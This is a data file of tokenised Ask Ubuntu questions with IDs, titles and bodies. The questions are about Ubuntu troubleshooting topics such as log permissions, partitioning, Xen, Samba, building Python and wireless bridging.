21475	awstats : can not access /var/log/apache2/access.log	i installed awstats on my new ubuntu lucid server , but when cron tries to run it as user www-data , it complains that can not access /var/log/apache2/access.log : permission denied . in /usr/share/doc/awstats/readme.debian there 's this paragraph : by default apache stores ( since version 1.3.22-1 ) logfiles with uid=root and gid=adm , so you need to either ... 1 ) change the rights of the logfiles in /etc/logrotate.d/apache so that www-data has at least read access . 2 ) as 1 ) but change to a specific user , and use the suexec feature of apache to run as same user ( and either change the right of /var/lib/awstats as well or use another directory ) . this is more complicated , but then the logs are not generally accessible to the server ( which was probably the point of the apache default ) . 3 ) change awstats.pl to group adm ( but beware that you are then taking the risk of allowing a cgi-script access to admin stuff on the machine ! ) . i 'd go with 1 , but what are the recommended permissions to grant ?
21477	is it safe to resize root partition ?	my hdd is partitioned into two equal sized partitions . first is being used for windows and second for ubuntu . everything is working fine . but now i want to remove windows and use the disk completely for ubuntu . i can easily boot from live cd and use gparted to delete windows partition and then expand ubuntu partition to use the whole hard disk . i want to know if its safe will resizing ubuntu partition change any thing else like the partition uuid or any thing else ? do i need to reinstall grub after resizing the root partition ? it would be great if some one who has already done this can give their advice here .
21478	using spyder2 to calibrate monitor	has anyone managed to use spyder2 to calibrate a monitor in maverick ? i have seen some tutorials about argyll , but it seems complicated , and i 'm not sure spyder2 will work ( and the tutos were oldish ) ...
21482	how to do simple home-automation ?	i am looking for some guide , examples , books to do simple things ( automation ) with ubuntu . like turning on / off the electricity open doors etc any idea would be appreciated , thanks .
21486	show icon instead of text for the gnome menus ?	is it possible to use icons instead of text for the menus in the top pannel ( shown above ) ? if so , how can we do that ? i 've tryed gconf-editor setting the key : /desktop/interface/toolbar_style with the value of `` icons '' but nothing happens .
21489	xen 4.0.1 not booting with device not found error	i 'm trying to get xen 4.0.1 run as dom0 on a fresh/clean install of 10.10 desktop ( x64 ) . followed the step by step tutorial at http : //wiki.xensource.com/xenwiki/xen4.0 i have the pvops kernel in /boot , also included the ext4 fs support by recompiling the kernel by : make -j6 linux-2.6-pvops-config configmode=menuconfig make -j6 linux-2.6-pvops-build make -j6 linux-2.6-pvops-install here 's my grub entry : menuentry 'xen4 ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 insmod ext3 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set 2bf3177a-92fd-4196-901a-da8d810b04b4 multiboot /xen-4.0.gz dom0_mem=1024m loglvl=all guest_loglvl=all module /vmlinuz-2.6.32.27 root=uuid=2bf3177a-92fd-4196-901a-da8d810b04b4 ro module /initrd.img-2.6.32.27 } blkid /dev/sda1 gives the : /dev/sda1 : uuid= '' 2bf3177a-92fd-4196-901a-da8d810b04b4 '' type= '' ext3 '' my partition shemes is : /boot ( ext3 ) ( /dev/sda1 ) / ( ext4 ) ( /dev/sda5 ) whatever option i 've tried i end up with : mounting none on /dev failed : no such file or directory and message complaining that it can not find the device with uuid ... edit : also tried to put root=/dev/sda1 ( and /dev/sda5 ) also put acpi=off noapic nolapic always fall back to initramfs busy box . when in initramfs i try to see whether there is a /dev/sdxx and nothing , neighter /dev/device* . my /lib/modules/2.6.32.27/ only contains a very few amount of files ( in comparison to the generic file ) ; did i miss something with the modules ? this pv ops is taking my hairs out , if somone has a clue ...
21490	does not recognize usb sticks and drives	when connecting any usb stick to my thinkpad ubuntu 10.10 does not recognize them . i do n't see anything on the desktop . the output of `` dmesg | tail -n10 '' gives me : [ 1965.696388 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1965.884537 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1966.072503 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1966.260349 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1966.506227 ] usb 1-1 : new high speed usb device using ehci_hcd and address 9 [ 1966.572375 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1966.760379 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1966.948358 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1967.136335 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 1967.325423 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 when connecting my usb scanner to the same port : [ 2008.480135 ] usb 1-1 : new high speed usb device using ehci_hcd and address 65 [ 2008.548389 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2008.736786 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2008.924379 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2009.112348 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2009.300443 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2009.488536 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2009.732180 ] usb 1-1 : new high speed usb device using ehci_hcd and address 71 [ 2014.796299 ] hub 1-0:1.0 : unable to enumerate usb device on port 1 [ 2018.000128 ] usb 2-1 : new full speed usb device using uhci_hcd and address 3 and ubuntu 10.10 recognizes that scanner . so what can i do to see my usb stick ? on my other thinkpad running fedora 14 it works perfectly ... it happens only to storage media ( usb sticks , cameras , etc. ) . my scanner ( hp scanjet 2200c ) works like a charm .
21493	nautilus crashes after ubuntu tweak package cleaner	few days ago i started having some problems with nautilus . basically when i 'm trying to get into a folder it crashes . it 's not happening all the time , but in 85 % it does ... sometimes , after the crash all my desktop icons are also gone . the only thing that i think causes this is ubuntu tweak - i 'm not sure , but the issues started after i did the package cleaner from ubuntu tweaks ... any ideas ? -- -- -- - edit 2 - important ! ! ! -- -- -- -- -- it seems i fixed this problem doing these : 1 ) i uninstall this nautilus script - http : //mundogeek.net/nautilus-scripts/ # nautilus-send-gmail 2 ) i installed nautilus elementary so far is back to normal ... if anything bad happens again i will come back ! -- -- -- -- edit 1 -- -- -- -- -- first time , after running the command ( nautilus -- quit ; nautilus -- no-desktop ) 3 times all the system crashed ( except the mouse , i could move the mouse ) . after restart i run it and obtain this : -- -- - initializing nautilus-gdu extension initializing nautilus-dropbox 0.6.7 ( nautilus:2966 ) : gconf-critical ** : gconf_value_free : assertion value ! = null ' failed ( nautilus:2966 ) : gconf-critical ** : gconf_value_free : assertionvalue ! = null ' failed nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . and then this : cristi @ cris-laptop : ~ $ nautilus -- quit ; nautilus -- no-desktop ( nautilus:3810 ) : unique-dbus-warning ** : error while sending message : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken .
21494	how to use rhythmbox-client on lan ?	a few days ago i had asked this question , and according to one suggestion , used rhythmote . it is a web-interface to change songs on a rhythmbox playing on some pc . however , its not what i had thought of , and i stumbled upon documentation for rhythmbox-client . i tried a few ways of using it , but was unsuccessful . let me show you a few ways of how i did it . the rhythmbox is running at address 192.168.1.4 , lets call it jukebox . passing the address as a parameter hoping that i would be able to see and browse through songs on the jukebox rhythmbox-client 192.168.1.4 but , i get this message ( rhythmbox-client:8370 ) : rhythmbox-warning ** : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . ( rhythmbox-client:8370 ) : rhythmbox-warning ** : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . ssh ssh -l jukebox 192.168.1.4 rhythmbox-client -- print-playing which spat this at me : ( rhythmbox-client:9389 ) : rhythmbox-warning ** : /bin/dbus-launch terminated abnormally with the following error : autolaunch error : x11 initialization failed . rhythmbox-client as root gksudo rhythmbox-client 192.168.1.4 a rhythmbox client comes up , but with no music shown in the library . i am guessing this is running on my own computer . can anyon tell me how rhythmbox-client is to be run , and is it even correct of me to think that i can get a rhythmbox window showing the songs on the jukebox ? ps : there were a few other solutions mentioned , but i want to evaluate each and every one of them . thanks .
21497	what are the downsides of removing ubuntu-desktop metapackage ?	i once advised someone to remove a package that depends on ubuntu-desktop meta-package , if she did n't need it ( eg : if one uses a different editor than gedit ) . someone else said that doing so ( removing gedit which will in turn remove ubuntu-desktop ) could break things . is this true ? are there any other potential problems ?
21501	possibility of recovering files from a dd zero-filled hard disk	i have `` zero filled '' ( complete wiped ) an external hard disk using dd , and from what i have heard : people said you should at least `` zero fill '' 3 times to be sure that the data are really wiped and no one can recover anything . so i decided to scan the disk once again after i 've zero filled the disk . i was expecting the disk to still have some random binary left . it turned out that it has only a few sequential bytes in the very beginning . this is probably the file structure type and other headers stuff . other than that , it 's all zeros and nothing else . so if we have to recover any file from a zero filled disk , ... how ? from what i 've heard , even you zero fill the disk , you should still have some data left . ... or could dd really completely annihilate all data ?
21504	can linux be windows substitute ?	can i use linux as a substitute of windows ? i mean can i use ms office , photoshop and other softwares which i usually use in windows ?
21521	what is the command to know my pulseaudio version ?	what is the command to know my pulseaudio version ?
21523	screen brightness not changing on acer 5742 notebook	screen brightness is not changing on my acer 5742 notebook . i have ubuntu 10.10 installed inside windows 7 os . hotkeys are used for changing brightness . though , a bar displaying brightness level appears on screen but there is no actual change in brightness of screen .
21527	unable to locate package mozilla-acroread	i just upgraded to 10.10 and installed acrobat via adobe 's website . i ca n't seem to get the firefox plugin . i updated my software sources to include mediabuntu , but when i enter sudo apt-get install mozilla-acroread i get `` unable to locate package mozilla-acroread ''
21531	upgrading ubuntu 7.10 server ( gutsy )	i have an ubuntu 7.10 server running and finally there is time to upgrade it ... ; - ) the updating mechanism does not work anymore . is it actually possible to upgrade , or should i rather install a fresh ubuntu server 10.04 ? if an upgrade is possible , do you have any recommendations ? thanks , philip
21537	is there a ppa or debian package for thunderbird 3.3a ?	i 'm trying to find a debian installer for thunderbird 3.3 ( in development ) or a ppa . i could n't find any ppas , but i 'm guessing someone must have created one by now : d. anyone know where i can get one ? please do not suggest the mozilla-daily ppa , i 'm using it , but for some reason they stopped adding the newest thunderbird builds at 3.1 ( that ppa is odd like that ) .
21540	garbled display after ubuntu upgrade to 2.6.32-2* kernel	i was running ubuntu 9.10 ( karmic koala ) with no problems . i recently upgraded to ubuntu 10 ( lucid lynx ) and can not use it normally . after i log in , the screen scrambles ( a purple/green mess ) -- impossible to see anything , although i can get out by marking the spot on the screen to click for a restart , so linux is working behind the scenes . if i start in recovery mode with basic graphics , i have no problems at all ( other than limited functionality ) . if i start the old 2.6.31-22 kernel , i see a bunch of `` unmountable '' errors in the startup script , but i can use linux normally with no apparent problems . i 'm running an ibm thinkpad a30 with ati mobility graphics . just to reiterate , the screen looks normal until i log in , at which point it goes bonkers . what do i need to change in order to fix this ?
21547	what are the packages/libraries i should install before compiling python from source ?	once in a while i need to install a new ubuntu ( i used it both for desktop and servers ) and i always forget a couple of libraries i should have installed before compiling , meaning i have to recompile , and it 's getting annoying . so now i want to make a complete list of all library packages to install before compiling python ( and preferably how optional they are ) . this is the list i compiled with below help and by digging in setup.py . it is complete for ubuntu 10.04 and 11.04 at least : build-essential ( obviously ) libz-dev ( also pretty common and essential ) libreadline-dev ( or the python prompt is crap ) libncursesw5-dev libssl-dev libgdbm-dev libsqlite3-dev libbz2-dev for python 3.2 and later : liblzma-dev more optional : tk-dev libdb-dev ubuntu has no packages for v1.8.5 of the berkeley database , nor ( for obvious reasons ) the sun audio hardware , so the bsddb185 and sunaudiodev modules will still not be built on ubuntu , but all other modules are built with the above packages installed . python 2.5 and python 2.6 also needs to have ldflags set on ubuntu 11.04 and later , to handle the new multi-arch layout : export ldflags= '' -l/usr/lib/ $ ( dpkg-architecture -qdeb_host_multiarch ) '' for python 2.6 , 2.7 and 3.0 you also need to explicitly enable ssl after running the ./configure script and before running make . in modules/setup there are lines like this : # ssl=/usr/local/ssl # _ssl _ssl.c \ # -duse_ssl -i $ ( ssl ) /include -i $ ( ssl ) /include/openssl \ # -l $ ( ssl ) /lib -lssl -lcrypto uncomment these lines and change the ssl variable to /usr : ssl=/usr _ssl _ssl.c \ -duse_ssl -i $ ( ssl ) /include -i $ ( ssl ) /include/openssl \ -l $ ( ssl ) /lib -lssl -lcrypto python 2.6 and 3.0 also needs modules/_ssl.c modified to be used with openssl 1.0 , which is used in ubuntu 11.10 . at around line 300 you 'll find this : else if ( proto_version == py_ssl_version_ssl3 ) self- > ctx = ssl_ctx_new ( sslv3_method ( ) ) ; /* set up context */ else if ( proto_version == py_ssl_version_ssl2 ) self- > ctx = ssl_ctx_new ( sslv2_method ( ) ) ; /* set up context */ else if ( proto_version == py_ssl_version_ssl23 ) self- > ctx = ssl_ctx_new ( sslv23_method ( ) ) ; /* set up context */ change that into : else if ( proto_version == py_ssl_version_ssl3 ) self- > ctx = ssl_ctx_new ( sslv3_method ( ) ) ; /* set up context */ # ifndef openssl_no_ssl2 else if ( proto_version == py_ssl_version_ssl2 ) self- > ctx = ssl_ctx_new ( sslv2_method ( ) ) ; /* set up context */ # endif else if ( proto_version == py_ssl_version_ssl23 ) self- > ctx = ssl_ctx_new ( sslv23_method ( ) ) ; /* set up context */ this disables ssl_v2 support , which apparently is gone in openssl1.0 . python 2.4 ( yes , i still have some old projects that need 2.4 ) needs this patch to setup.py : -- - setup.py 2006-10-08 19:41:25.000000000 +0200 +++ setup.py 2012-05-08 14:02:14.325174357 +0200 @ @ -269,6 +269,7 @ @ lib_dirs = self.compiler.library_dirs + [ '/lib64 ' , '/usr/lib64 ' , '/lib ' , '/usr/lib ' , + '/usr/lib/x86_64-linux-gnu' ] inc_dirs = self.compiler.include_dirs + [ '/usr/include ' ] exts = [ ] @ @ -496,7 +497,8 @ @ ssl_incs += krb5_h ssl_libs = find_library_file ( self.compiler , 'ssl ' , lib_dirs , [ '/usr/local/ssl/lib ' , - '/usr/contrib/ssl/lib/' + '/usr/contrib/ssl/lib/ ' , + 'x86_64-linux-gnu' ] ) if ( ssl_incs is not none and and it needs to be compiled with : env cppflags= '' -i/usr/lib/x86_64-linux-gnu '' ldflags= '' -l/usr/include/x86_64-linux-gnu '' ./configure -- prefix=/opt/python2.4
21548	tor stops while bootstrapping , what could be the problem ?	since last week i am having a problem using tor . it says bootstrapped 10 % finishing handshake with directory server and then it just stops . it might help to say that i am in iran . any idea how to solve it ? thanks .
21553	how do i completely reset samba to the shipped defaults ?	since no one can help me with sharing files from samba , how can i reset it to the defaults and delete any residual configurations from previous releases ? then , presumably , the gui sharing would work after i reinstall samba . i tried using dpkg reconfigure samba , but it made things even worse , and now my ubuntu computer 's hostname stopped existing . > : (
21555	command to append line to a text file without opening an editor	assuming i have a line that i want to add to a file without opening an editor . how could i append this line alias list='ls -cl -- group-directories-first' to this file config.fish
21556	how to create an empty file from command line	how can i create an empty file from the command line ?
21561	how to install jdk and netbeans ?	i have downloaded a .bin file for jdk and am trying to install it . i have used these commands : chmod +x jdk-6u23-linux-i586.bin sudo ./jdk-6u23-linux-i586.bin and got this output : sudo : ./jdk-6u23-linux-i586.bin : command not found
21563	how do i enable my desktop visual effects	i am aashish here i ve been using ubuntu 10.10 nearly 2 weeks n i find it very good to work on with but i have some issues in enabling the visual effects on my system .. it doesnt allow me to use the normal & the extra..options given its checks for the drivers n then it say drivers not found ( my laptop model is : compaq presariov2000 ) how do i enable it plzzz help me.. : )
21568	how to read/write files to hfs+ ( journaling ) partition ?	how to read/write files to hfs+ ( journaling ) partition ?
21571	how to import/export radio station list of rhythmbox ?	is it any way to import/export radio station list of rhythmbox ? if not , could you please suggest me any good music player which has similar functionality like rhythmbox ? thank you !
21572	tips for debugging samba performance ?	samba gives me 24 mb/s read and 44 mb/s write , while ftp gives 97 and 112 mb/s under the same circumstances . the documentation says that generally , you should find that samba performs similarly to ftp at raw transfer speed . in my case it clearly does n't . where can i find tips on how to debug samba performance ? or alternatively tips for replacing samba with something else ? ( i ca n't use ftp , unfortunately , as i need something that can be used with rsync/rsnapshot . ) more details : both computers are running ubuntu 10.10 ( using samba because i have a mac as well ) the samba share is on a local home network , mounted as $ mount ... //server.local/share/ on /mnt/share type cifs ( rw , mand ) samba performance was tested by copying ( cp ) a single file of ~4gb to and from the share , using time for timing and calculating transfer speed by hand . ftp performance are the numbers from the ftp client for get/put of the same file . iperf gives network speed ~900 mbits/s bonnie++ gives disk speeds > 200 mb/s on both sides for block reads as well as block writes tried changing the parameters suggested in the performance tuning howto ( read/write raw , read size , socket options ) , most of them made little to no difference . ( the one that made a difference caused write speed to drop 50 % . )
21578	flash is not working in chrome ( crossover linux is installed )	i have google chrome 8.0.552.237 on ubuntu 10.10 64-bit and flash is not working , i have tried a variety of methods to install flash , including firefox flash-aid and the flash-installer package and nothing is working for me . i have even uninstalled and reinstalled chrome to no avail . i get `` missing plugin '' message where flash plugin should be in a website . what am i missing ? i have a variety of plugins returned by jgbelacqua 's command : /usr/lib/chromium-browser/plugins/flashplugin-alternative.so /usr/lib/firefox/plugins/flashplugin-alternative.so /usr/lib/flashplugin-installer/libflashplayer.so /usr/lib/iceape/plugins/flashplugin-alternative.so /usr/lib/iceweasel/plugins/flashplugin-alternative.so /usr/lib/midbrowser/plugins/flashplugin-alternative.so /usr/lib/mozilla/plugins/flashplugin-alternative.so /usr/lib/xulrunner/plugins/flashplugin-alternative.so /usr/lib/xulrunner-addons/plugins/flashplugin-alternative.so /usr/share/ubufox/plugins/libflashplayer.so /var/cache/flashplugin-installer/libflashplayer.so i 'm not sure which is necessary and which not . i should note tho that my chromium does have flash and it does work ... just not chrome or firefox .
21584	what 's the best way to re-install ubuntu on my dual-boot system ?	i have a triple boot system with windows , and ubuntu 10.10 , installed in that order , plus a `` data '' partition that has all my data , what i want to do is remove the 10.10 , and replace 11.04 i would like to install a fresh copy of 11.04 and leave the rest of the system intact , what is the best way to do this ?
21585	installed ubuntu on top of xp and ca n't boot xp	i had windows xp installed without partitioned hard drive , and partitioned and installed ubuntu with the ubuntu live cd . there is no menu at startup for which operating system ; it just boots up ubuntu . suggestions ?
21586	how can i configure dbus to allow ssh-user to suspend server ?	i try to suspend my server using dbus and upower . the server runs ubuntu lucidlynx 64bit . while everything works fine if i am sitting directly at the machine , it wo n't work via ssh . if i connect to the server via ssh and try to suspend the machine using dbus and upower , it gives back dbus.exceptions.dbusexception : org.freedesktop.upower.generalerror : not authorized could anyone please tell me how to configure dbus in order to allow ssh-users to suspend the machine ?
21587	how do i clean up my harddrive ?	not to long ago i was using only 35 % of my hd . just recently it shot up to 54 % and my diskspace is 16gb so that 's more then 3gigs that have been taken . from what i remember i failed to build mysql , i installed gitolite which required me to build git from source which had a tons of dependencies ( i think it was for building docs , i think i saw latex and other packages but i was drowsy when i was installing ) . i suspect that is what is taking the diskspace . anyways so far i deleted source folders i know i had and ran these commands . what else can i do ? ( 3gigs is mighty ) sudo apt-get autoclean sudo deborphan | xargs sudo apt-get -y remove -- purge after doing the above i did ncdu and found that git itself was actually using 502mb in 152 files all in '/usr/local/libexec/git-core ' . who knew . i found it strange that most of those files are 4.6mb each ... mysql was taking up 1+gb in my /tmp folder i accidentally made a copy of my mono src folder which has two builds of mono and is 1.7gb together . after deleting the copy of src and an extra mono build ( thats 2.6gb together ) + the mysql in my temp folder df now reports 28 % instead of 54 % which makes me feel a lot better . i 'm still surprised git uses 502mb . on windows it uses 57mb ( thats about 10xless ) . and the equivalent folder ( c : \program files ( x86 ) \git\libexec\git-core ) has all those apps as shortcuts to git . and git is only 1.2mb ( not 4.6 ) . also i checked if the linux git-core folder were all links , i know they arent softlinks ( i used the cmd find . -maxdepth 1 -type l -print0 | xargs -0 ls -ld ) i tried stat git , stat git-add and saw they had the same innode . so most of these files are hardlinks ( i assume ) of git . so git doesnt actually take up that amount of space .
21596	how do i use bash 's `` < < `` operator ?	i know bash has a > > operator , to append output to files , but what is the use of the < < operator ?
21598	how can i determine what codec is being used ?	this forum comment and this superuser answer suggest that the audio compression contributes to loss of quality . i 've noticed that music played over my bt setup sometimes pitch bends in ways i do n't remember the original doing , and i 'm wondering if sbc has something to do with it . i 'm using ubuntu 10.10 on a mac pro , connecting to a pair of sony dr-bt50 's . is there a way to inspect which bluetooth codec pulseaudio is using , what codecs both ends of the bluetooth link support ?
21600	can i get an always-on-top button in windows ' titlebar ( alongside with minimize/maximize/close buttons ) ?	i use to use always-on-top windows frequently and make them such by setting the option in windows ' right click menu . can i get this option closer , right in windows ' titlebar alongside with minimize/maximize/close buttons ?
21603	meta package / quick reference for command line string manipulation tools ?	the latest version of the scribes text editor lets us select some text , hit alt+x , and then run an arbitrary command . for example , i can run the sort command and the selected text is replaced appropriately . this is quite useful but i am also not very well-versed in awk and the like . is there something i can grab that will provide more of these commands like sort ? maybe a package with a whole bunch of handy , task-specific string manipulation commands ?
21604	how to install 3d support ?	i 'm trying natty and after an upgrade i received this message : '' sorry , you do n't have 3d support , install it for your graphic hardware to get unity or please reboot and select 'classic session ' at startup . '' so i want to install 3d support but i do n't know how to . my machine is a sony vaio vgn-sr29xn laptop with intel graphics , but i would like to know the general instructions . p.s . : i 've no problem with the cli , i just do n't know how to proceed in this particular case ( what driver , or program ... ) .
21605	what is the size of ubuntu repository ?	i would like to know the total size of ubuntu repository with individual repository-component ( main , universe , multiverse , restricted ) sizes for : 32-bit platform . 64-bit platform .
21606	is there a way to setup two users with one account ?	i purchased ubuntu one and was wondering if there was a way to share the 20gb storage with another user on the same computer . something like a family plan , with shared storage but separate files , synced to different /home directories . it seems to me if i do n't need all 20gb it would be wasteful to pay twice .
21608	use video file as a screensaver ?	i want to make my video to be a screensaver . is there any software to make it ?
21613	can i remove the countdown when installing extensions in firefox ?	when installing an extension in firefox , the confirmation dialog makes you wait 5 seconds before you can install the extension . i find it annoying and unnecessary , is there a way to shorten or remove the countdown so i can install extensions without waiting ?
21614	why does n't /dev/fb0 exist ?	i am attempting to install and use fbgrab , but it requires /dev/fb0 to exist . how can i create this file ? my computer specs : dell studio 1555 , ati radeon 4500 , proprietary graphics driver
21617	how to register vlc as a multimedia player in ubuntu system ?	in `` preferences - preferred applications '' there is a choice of totem and rhythmbox ( actually it was , before i 've uninsulated both of them favouring deadbeef for audio , raw mplayer for video and vlc for occasions ) and custom . can i add a player ( vlc for example ) to appear in that list , officially recognised as a player application ( not just `` custom '' ) ?
21618	`` unable to mount audio disc location is unmountable '' error	i 've lost use of my cdrom player in ubuntu 10.10 . the message is `` unable to mount audio disc location is unmountable '' . how can i correct this ?
21619	what 's wrong with tasksel ubuntustudio- packages ?	trying to install any of ubuntustudio- ( ubuntustudio-audio , ubuntustudio-font-meta , etc . ) `` tasks '' with tasksel always fails , saying `` tasksel : aptitude failed ( 100 ) '' ( while other options , like lamp-server , for example , work ok ) . why ?
21621	ubuntu one wo n't synchronize pictures folder	when i try to sync /home/tyler/pictures i get could not enable /home/tyler/pictures for syncing to ubuntu one
21628	ipod crashes after transfering music from rhythmbox	i have been using rhythmbox for a long time to transfer music to my 3.1 ipod touch 3rd gen , however after recently transferring an album my music app refuses to load . sometimes it instantly crashes , sometimes i get a song list and then a freeze , sometimes only the basic gui comes up , and other times i get a `` updating library '' which crashes or sits there endlessly . any thoughts on fixing ?
21632	slow response and system lag	recently my computer has been responding slowly . it was fine few days ago , but now it always lags . i need to find the cause . thanks .
21633	remove install dialog from ubuntu usb stick	i 've created a ubuntu booting usb stick . is it possible to remove the `` install ubuntu '' dialog that appears everytime i boot from the usb stick ?
21641	how to upgrade to the development version of ubuntu 11.04 ?	how do i upgrade ubuntu 10.10 to the latest development version of ubuntu 11.04 ?
21645	an application asks to unlock the keyring on startup , but it does n't say which one	a couple of weeks ago a popup has appeared whenever i startup telling me that an application wants to access the keyring but it does n't say which one . i 'm used to seeing the application name on the popup but here it just says 'application ' . i have n't changed any passwords or did anything that might have something to do with that , to my knowledge . i saw this question but like i said , i have n't changed any of my passwords , and i do n't want my keyring password to be empty . how can i find out which application is asking to unlock the keyring and fix it ? here 's how it looks like :
21647	unable to resolve hostnames while using apt , what could be the problem ?	until two days before today my ubuntu 10.10 server updated fine . the output of sudo aptitude update → http : //codepad.org/tkvxq66j the output of sudo aptitude update after replacing the ubuntu central archive 's domain with the ip → http : //codepad.org/qkgrhy8e apt sources → http : //codepad.org/yh6e9tae hosts → http : //codepad.org/yodowbhp /etc/resolv.conf → http : //codepad.org/cba5kaet
21650	can i use standard tools to get the full name of a process , when its name has embedded spaces ?	i understand that it may be a rare situation for an executable to have spaces in it , but it could happen . an example may be the best explanation.. using standard tools , i want to determine the location ( on the file system ) of the executable which owns ( ? ) the current window ... get the current window id ... ( xdotool getactivewindow ) use the id to get the pid ... ( wmctrl -p -l | sed ... id ... . use the pid to get the executable 's name ... ( ps -a ... here is where i run into problems ! whith ps , when listing only the executable 's name ( -o ucmd ) , it truncates the name to 15 characters , so this rules out this option for any name which is longer . widening the column ( -o ucmd:99 ) makes no difference.. if pgrep is anything to go by , its matching is limited to 15 because of stat ( see : info pgrep ) .. listings in variants of `` full '' mode ( eg -a w w ) are not useful when the name concerned has spaces in it , because this name is separated from its args by another space ! .. also , in `` full '' mode , if the process was started by a link , the name of the link is shown , rather than the executable 's name . is there some way to do this ( using standard tools ) ? ... or are spaces a show stopper here ?
21651	how to upgrade all 50 desktops in a network ?	how can i upgrade all the 50 desktops to maverick meerkat . is there any netinstall method ?
21652	how can i enable visual effects on ubuntu 10 running on vmware player on windows 7 ?	i am running ubuntu 10 on a vmware player running on windows 7 . i have an geforce 8800 card . currently i ca n't run visual effects , and i was n't able to find any answer except for changing the vm to virtualbox . since i already use vmware for other purposes , i do n't want to use virtualbox . is there a way to enable visual effects and stay in vmware ? thanks , sakin
21654	how to temporarily turn off networkmanager from the command-line ?	the network interface should not make a request for an ip over dhcp . so , what is the command to turn off networkmanager in ubuntu ? update : i am writing a script in which the interfaces receive static ips . for this to happen i need to put a line in the script which will turn off networkmanager . but when i 'm not using that script i want to have dhcp on the interfaces .
21657	show apt-get installed packages history via commandline ?	is there a way to show the history of installed packages that were installed by apt-get via commandline ?
21662	can i use gparted to resize a truecrypt-encrypted partition ?	i have an external drive with two partitions - one encrypted , the other not so . i 'd like to move all the data to the encrypted partition , and then resize it to take up the whole drive . if i use gparted on a truecrypt-encrypted partition , will that destroy the data ? otherwise i have to decrypt , merge , resize and then re-encrypt .
21666	can turning off drm_kms_helper polling affect screen brightness control ?	i have a samsung r430 notebook that has been running ubuntu for close to a year , now . since i 've upgrated to maverick , i 've been dealing with little , but increasingly annoying issues , that put my faith to question . the first one , a cpu-intensive set of drm_kms_helper , made me compile my own kernel and set polling to off just so i could move my mouse without frequent stuttering . that led me to dealing with a screen that gets dimmer and dimmer after each sleep/wake-up cycle , which eventually leads me to reboot . since i have seen some kms and brightness related bugs around , i was wondering if it is a definite cause for my problem . if so , has there been any advance on the excessive polling issue for those of us plagued by it ?
21669	is there any api for ubuntu one ?	is there an api set for ubuntu one ? for example , an api to sync contacts , bookmarks , etc .
21671	two ubuntu one shortcuts in places menu	after updating ubuntu one , i 'm stuck with 2 shortcuts to ubuntu one in my places menu . how can i remove it ?
21673	hybrid wireless network repeating	summary : i 'd like to use two ubuntu computers to extend/compliment an existing wireless access point . i have a network which currently looks a bit like this : what the diagram does n't show is the interference caused by our house . it 's a wifi-blocking robot sent here from the past . the two wired computers are in areas where the signal is most blocked ( not by design , just a happy co-incidence ) . both wired computers have fairly good network cards . they 're both ubuntu machines and i would like to turn them into additional base stations . i know i could throw more networking hardware at this ( network extenders or cable in additional , pure wireless access points ) but i 've got two linux machines sitting in ideal places and i feel like they should be able to help me out . i 've tried ad-hoc networks but i need something that is a lot more transparent ( eg you can migrate from base to base without a connection dropping ) ; it should look like one network to clients . here 's a diagram of what i want :
21674	wiped data , and duplicated folders into files	something weird happened today , and i dont know how . within a folder , all folders have a file by the same name , with a colon appended to it . and all the files from the most inner-most directory in my home , have been dumped to ~ , with a size of 0 bytes . i have not executed any scripts or anything . i was just checking out some easter eggs , namely the gegls from outer space and free the fish and was away from the computer and was logged because of the screensaver . i couldnt log-back in with my password , so i just reset the pc , and while booting , the pc went into a drive check . but , iirc , i saw the duplicate `` folder files '' before i had logged out , so thats not the reason ! all the files have a timestamp of 14 jan. also , the contents of my eclipse folder have been dumped into ~ . right down to the jars and ini files . help !
21679	how to stop wireless ap hosting using network manager on ubuntu ?	i use the following script to make my netbook a full-fledged wireless access point . it creates a bridge with eth0 and wlan0 and starts hostapd . # ! /bin/bash service network-manager stop ifconfig eth0 0.0.0.0 # remove ip from eth0 ifconfig eth0 up # ensure the interface is up ifconfig wlan0 0.0.0.0 # remove ip from eth1 ifconfig wlan0 up # ensure the interface is up brctl addbr br0 # create br0 node hostapd -d /etc/hostapd/hostapd.conf > /var/log/hostapd.log & sleep 5 brctl addif br0 eth0 # add eth0 to bridge br0 brctl addif br0 wlan0 # add wlan0 to bridge br0 ifconfig br0 192.168.1.15 netmask 255.255.255.0 # ip for bridge ifconfig br0 up # bring up interface route add default gw 192.168.1.1 # gateway this script works efficiently . but if i want to revert back to use network manager , i can not do it . the bridge simply can not be deleted . how can i modify this script so that if i run bridge_script -- stop , the bridge gets deleted , network manager starts and interfaces behave as if the machine had a fresh reboot .
21681	how do i correctly remove items from wine programs menu ?	as soon as a windows application creates a shortcut/directory in wine start menu programs directory ( in particular i do this manually by means of total commander and it works ) , it gets reflected in ubuntu wine programs menu . but when a shortcut/folder is removed ( manually , by means of total commander again ) , the ubuntu wine programs menu item persists , and this is an undesirable behaviour . i 've once done something causing wine/ubuntu to actually refresh the menu state and remove orphan items , but unfortunately i ca n't remember what . do you know the way ? i am specifically interested in hand-made/removed shortcuts , not installing/uninstalling windows software .
21686	how do i install and switch to the unity 2d desktop ?	i read that there is now a 2d version of unity built on qt . how do i install it , and once it 's installed , how do i switch to it ?
